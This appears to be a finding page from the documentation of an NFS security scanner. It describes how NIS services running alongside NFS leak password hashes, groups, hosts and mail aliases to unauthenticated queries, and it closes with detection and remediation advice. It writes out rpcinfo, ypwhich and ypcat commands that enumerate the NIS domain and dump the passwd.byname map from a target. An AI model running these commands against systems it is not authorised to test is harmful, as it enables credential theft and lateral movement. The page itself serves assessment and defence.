Skip to content

F-5.3: NIS Credential Extraction via Co-hosted RPC

Classification

  • Severity: High
  • CVSS Vector: Network / Low Complexity / No Auth Required
  • Affected Versions: Systems running NIS (ypserv/ypbind) alongside NFS
  • Prerequisite: NIS domain name discoverable; ypserv registered in portmapper

Summary

NIS (Network Information Service, formerly YP "Yellow Pages") is an RPC-based directory service frequently co-hosted on the same machines as NFS. When portmapper enumeration reveals ypbind/ypserv, an attacker who can determine the NIS domain name can extract password hashes, group memberships, hostnames, and mail aliases — all without any authentication.

NIS is discovered through the same portmapper (port 111) scan that finds NFS, making it a natural lateral finding during NFS assessments.

Technical detail

Discovery

NIS services appear in portmapper output alongside NFS/mountd/NLM:

program  vers  proto   port  service
100004    2    tcp    798   ypserv    # NIS server
100004    2    udp    800   ypserv
100007    2    tcp    809   ypbind    # NIS client binding
100007    2    udp    813   ypbind

Domain name enumeration

The NIS domain name is required for queries. It can be obtained via:

# If you have local access or a shell:
domainname

# Via RPCBind (some implementations leak it):
rpcinfo -p target

# Brute-force with ypwhich:
ypwhich -d <guessed-domain> target

Credential extraction

Once the domain name is known, ypcat dumps all NIS maps without authentication:

# Dump password hashes (equivalent to /etc/passwd + /etc/shadow combined)
ypcat -d <domain> -h <target> passwd.byname

# Dump group memberships
ypcat -d <domain> -h <target> group.byname

# Dump host table
ypcat -d <domain> -h <target> hosts.byname

# Dump mail aliases
ypcat -d <domain> -h <target> mail.aliases

Available NIS maps

Master File Maps Content
/etc/passwd passwd.byname, passwd.byuid User credentials (may include hashes)
/etc/group group.byname, group.bygid Group memberships
/etc/hosts hosts.byname, hosts.byaddr Hostnames and IPs
/usr/lib/aliases mail.aliases Mail routing

Why this matters for NFS

  • NIS credentials reveal UID/GID mappings used across the NFS environment
  • Password hashes can be cracked to obtain credentials for legitimate access
  • Host tables reveal the full NFS infrastructure topology
  • Group memberships identify which GIDs grant access to sensitive exports

Impact

  • Full credential extraction (usernames + password hashes) without authentication
  • Topology discovery of the NFS infrastructure
  • UID/GID mapping intelligence enables targeted AUTH_SYS spoofing
  • Cracked credentials may grant Kerberos-authenticated NFS access on v4 servers

Detection (nfswolf)

The scanner should: 1. Check portmapper output for ypserv/ypbind registration (programs 100004/100007) 2. Flag co-hosted NIS as an informational finding 3. Optionally attempt domain name enumeration and ypcat extraction

Remediation

  1. Migrate from NIS to LDAP/Kerberos — NIS has no authentication whatsoever
  2. Restrict NIS to trusted subnets via TCP wrappers or firewall rules
  3. Use NIS+ or LDAP if directory services are required
  4. Remove NIS entirely if not needed: apt remove nis
  5. Never store password hashes in NIS — use shadow passwords with LDAP backend